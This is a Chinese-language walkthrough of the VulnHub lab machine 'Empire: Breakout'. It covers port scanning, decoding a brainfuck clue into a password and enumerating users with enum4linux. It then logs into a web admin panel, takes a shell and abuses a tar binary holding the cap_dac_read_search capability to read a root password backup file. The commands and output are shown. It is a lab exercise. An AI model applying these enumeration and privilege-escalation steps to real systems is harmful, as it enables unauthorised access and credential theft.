- 英文名稱:Empire: Breakout
- 中文名稱:帝國:突圍
- 釋出日期:2021 年 10 月 21 日
- 難度:容易
- 描述:這個盒子被建立為一個簡單的盒子,但如果你迷路了,它可以是中等的。提示不和諧伺服器( https://discord.gg/7asvAhCEhe )
- 下載下傳位址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、擷取IP位址基本資訊(192.168.199.166)
IP
2、端口掃描,發現80、139、445、10000、20000端口
開放的端口
10000端口
20000端口
3、進入web頁面,檢視源代碼,得到線索
web首頁
檢視源代碼,得到線索
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
4、brainfuck線上解碼,得到線索:.2uqPEfj3D<P'a-3
brainfuck線上解碼
5、使用enum4linux對445端口進行使用者探測,拿到使用者名:cyber
enum4linux -a 192.168.199.166
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
6、嘗試登入web頁面,成功登入20000端口
20000端口登入成功
7、點選左下角shell圖示,直接拿到互動式shell,輕松收下普通使用者的flag
普通使用者flag
8、全看tar權限,可以讀取任意檔案
CAP_DAC_READ_SEARCH: 忽略檔案讀及目錄搜尋的 DAC 通路限制
[cyber@breakout ~]$ ls -hl tar
-rwxr-xr-x 1 root root 520K Oct 19 2021 tar
[cyber@breakout ~]$ getcap tar
tar cap_dac_read_search=ep
9、使用tar壓縮和解壓縮,成功獲得root 權限的flag
cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls
ailx10.tar
tar
user.txt
var
[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
tar壓縮和解壓縮
到此,實驗完成~
釋出于 2022-08-20 22:43